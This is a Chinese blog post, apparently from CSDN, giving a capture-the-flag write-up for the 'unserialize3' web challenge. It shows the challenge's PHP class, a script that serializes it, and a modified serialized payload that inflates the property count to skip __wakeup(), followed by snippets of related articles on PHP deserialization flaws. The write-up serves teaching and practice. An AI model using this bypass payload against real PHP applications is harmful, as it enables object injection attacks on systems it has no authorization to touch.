攻防世界 unserialize3

最新推荐文章于 2023-08-11 15:52:58 发布
最新推荐文章于 2023-08-11 15:52:58 发布
阅读量1.4k 收藏 2
点赞数 1
分类专栏: ctf刷题纪 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52268949/article/details/122735712
版权
unserialize3
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
?code=

进入题目给出部分代码,注意发现到有个wakeup()函数,我们要想办法绕过这个函数,wakeup()有个执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行wakeup()函数,这也算是一个绕过点

我们编写exp

class xctf
{
    public $flag = '111';

    public function __wakeup()
    {
        exit('bad requests');
    }
}

$a = new xctf();
echo serialize($a);

得出结果我们修改属性值,只要比1大就行

O:4:"xctf":1:{s:4:"flag";s:3:"111";}#原来的运行结果
O:4:"xctf":3:{s:4:"flag";s:3:"111";}#修改后的payload

在这里插入图片描述

得出结果

听门外雪花飞
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】unserialize3解题详析(php序列化反序列化实例讲解)
等风来
05-21 4590
PHP 中,可以使用 serialize() 函数将对象序列化为字符串,然后保存到文件或传输到其他应用程序中。在 PHP 中,可以使用 unserialize() 函数将序列化后的字符串还原为原始的对象或数据,然后进行处理。对象被序列化并存储为字符串后,如果再次反序列化该字符串并尝试重建相应的对象时,PHP 就会自动调用该对象的。则是将序列化后的数据重新转换为对象、数据结构或变量的过程,以便在程序中进行操作或处理。在反序列化对象时自动调用,用于初始化对象的属性等操作。的对象,该对象有一个属性。
unserialize3与反序列化漏洞零基础详解
sGanYu
09-08 2883
反序列化漏洞(序列化←→反序列化) 什么是序列化(serialize) 将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将状态信息保存为字符串 什么是反序列化(unserialize) 将字符串转换为状态信息
unserialize3php序列化、反序列化及绕过)
Welcome To Myon'Blog !
03-27 754
PHP基础知识与理解,__wakeup()函数,new函数,PHP的序列化与反序列化,局部变量与全局变量,payload构造,脚本编写,绕过,get传参
unserialize3 反序列化
Rashu99's blog
09-01 279
参考blog 攻防世界 web进阶 unserialize3 题目 运行得到 重点关注被序列化的对象属性个数 当序列化字符串当中属性个数值大于实际的属性个数时,就会导致反序列化异常,从而跳过__wakeup函数 与序列化和反序列化的魔术方法主要是: __construct() //当一个对象创建时被调用 __destruct() //对象被销毁时触发 __wakeup() //使用unserialize时触发 __sleep() //使用serialize时触发 __toString() /
【愚公系列】2023年05月 攻防世界-Webunserialize3
热门推荐
时光隧道
12-27 3万+
反序列化漏洞是一种安全漏洞,存在于那些使用序列化技术的应用程序中。反序列化是将已序列化数据还原回对象的过程。攻击者可以通过构造恶意序列化数据来利用反序列化漏洞,从而在受害者的系统上执行任意代码或者进行远程攻击。攻击者可以通过修改序列化数据中的类名来指定一个恶意的类,该类将在反序列化过程中被实例化并执行其中的代码。攻击者还可以利用在对象反序列化期间执行的构造函数或readObject()方法中的任意代码执行漏洞,来进行恶意代码执行。
phpunserialize返回false的解决方法
10-25
主要介绍了phpunserialize返回false的解决方法,是PHP程序设计中非常经典的问题,需要的朋友可以参考下
php serialize()与unserialize() 不完全研究
10-19
3. **会话管理**:在 PHP 中,session 数据默认就是使用 `serialize()` 进行序列化,然后存储在服务器端,`unserialize()` 在用户下次访问时将数据还原。 4. **缓存数据**:在缓存系统中,如 Redis 或 Memcached,...
unserialize.php
11-08
unserialize.php
浅谈php serialize()与unserialize()的用法
10-27
`serialize()` 函数接收一个变量作为参数,返回该变量的一个字符串表示,这个字符串是可存储的,且包含了足够的信息以在稍后使用 `unserialize()` 函数恢复原始数据。在提供的例子中,`serialize()` 被用来处理一个 ...
浅谈php函数serialize()与unserialize()的使用方法
10-25
php中serialize()与unserialize()函数是一对函数,下面本文章就来为各位同学介绍serialize()与unserialize()函数的使用例子,希望能帮助到各位。
攻防世界--unserialize3 fileinclude
tzyyyyyy的博客
02-06 622
攻防世界--unserialize3 fileinclude
攻防世界unserialize3题解
黑锤的博客
08-14 6158
unserialize3 看题目就知道这是一道反序列化问题,之前也遇到过,也深入理解过,但时间隔了这么久,难免会有些忘记,通过这道题来再次深入序列化与反序列化的问题。 0x00:那么到底什么是序列化,反序列化呢? 先来讲一点为什么要用序列化呢?他到底好在哪里呢?php序列化是为了什么呢? 当然有一点都知道就是为了传输数据更加方便(这种压缩格式化储存当然在数据传输方面更加简单方便),我们把一...
flag--命令行参数定义多标签示例
metheir的博客
10-16 1504
// TestFlag2 project main.go package main import ( "flag" "fmt" ) func main() { //定义Flag //方式一:通过flag.String(), Bool(), Int() 等flag.Xxx()方法,该种方式返回一个相应的指针 namePtr := flag.Strin...
攻防世界-unserialize3详解
Mr_helloword的博客
08-11 5895
unserialize3 查看源代码: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 这是一个利用反序列字符串来进行绕过的题,根据提示我们要构造code参数,但是需要绕过wakeup函数 **__wakeup()**是PHP的一个魔法函数,在进行unserialize反序列化的时候,首先查看有无该函数有的话 就会先执行他 绕过: 可以通过增加对象的属性个数来进行绕过
学习笔记 | PHP反序列化漏洞
最新发布
m0_57133419的博客
08-11 199
其中wakeup()函数漏洞原理是类对象属性个数超过实际个数,也就是其中的类名称后面跟的数字就是属性,修改为2时,不执行wakeup函数。就不会输出bad request,如果用没修改过的序列化语句就会输出bad request。看到wakeup函数,先构造序列化语句输出。攻防世界unserialize3
攻防世界web---unserialize3
m0_72447684的博客
10-10 234
攻防世界web---unserialize3
xctf攻防世界 Web高手进阶区 unserialize3
l8947943的博客
07-24 9273
深度剖析PHP序列化和反序列化
unserialize3 攻防世界xctf web
weixin_45689999的博客
03-02 6865
unserialize3 打开的代码 class xctf{ //类 public $flag = '111';//public定义flag变量公开可见 public function __wakeup(){ exit('bad requests'); } ?code= __wakeup 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作。 所以猜测被反序列化了 但是可以看到这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值